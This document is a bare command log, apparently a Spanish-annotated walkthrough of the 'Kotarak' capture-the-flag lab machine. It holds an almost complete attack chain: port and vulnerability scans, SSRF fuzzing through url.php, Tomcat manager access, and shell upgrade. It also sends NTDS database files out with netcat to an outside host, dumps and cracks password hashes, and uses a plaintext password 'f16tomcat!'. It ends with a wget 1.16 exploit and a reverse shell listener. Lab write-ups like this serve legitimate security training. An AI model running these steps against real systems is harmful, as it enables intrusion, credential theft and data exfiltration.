nmap -A -p- -oA kotarak 10.129.1.117 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA kotarak 10.129.1.117
nmap -sU -O -p- -oA kotarak-udp 10.129.1.117
nmap -sCV -p80,443 10.129.1.117 -oN targeted
whatweb 10.129.1.117
http://10.129.1.117:60000
wfuzz -c -t 400 --hc=404 --hh=3 -z range, 1-65535 http://10.129.1.117:60000/url.php?path=http://localhost:FUZZ
http://10.129.1.117:60000/url.php?path=http://localhost:888?doc=backup
http://10.129.1.117:8080/manager/html
Ponemos las credenciales que encontramos en el grafico anterior.
python -c 'import pty; pty.spawn("/bin/bash")'
(CTRL+ Z)
stty raw -echo; fg reset xterm export TERM=xterm export SHELL=bash
find \-name user.txt 2>/dev/null | xargs cat
Vemos los archivos .dit y .bin
Transferimos archivos
nc 10.10.14.25 443 < 20170722._089134.bin
nc -lvnp 443 > ntds.bin
nc 10.10.14.25 443 < 20170722._089134.dit
nc -lvnp 443 > ntds.dit
file *
mv ntds.bin SYSTEM
mv ntds.dit ntds
python3 /opt/impacket/example/secretsdump.py -ntds ntds -system SYSTEM LOCAL
Vemos el hash de atanas
cat hash | awk '{print $4}' FS=":" | xclip -sel clip
Vamos a crackstation y vemos las credenciales
su atanas
password: f16tomcat!
ls -l /etc/authbind
authbind nc -lvnp 80
Vemos que la version de wget es 1.16
Cambiamos la ip y hacemos un reverse shell en el script.
authbind python -m pyftpdlib -p21 -w
authbind python exploit.py
nc -lvnp 443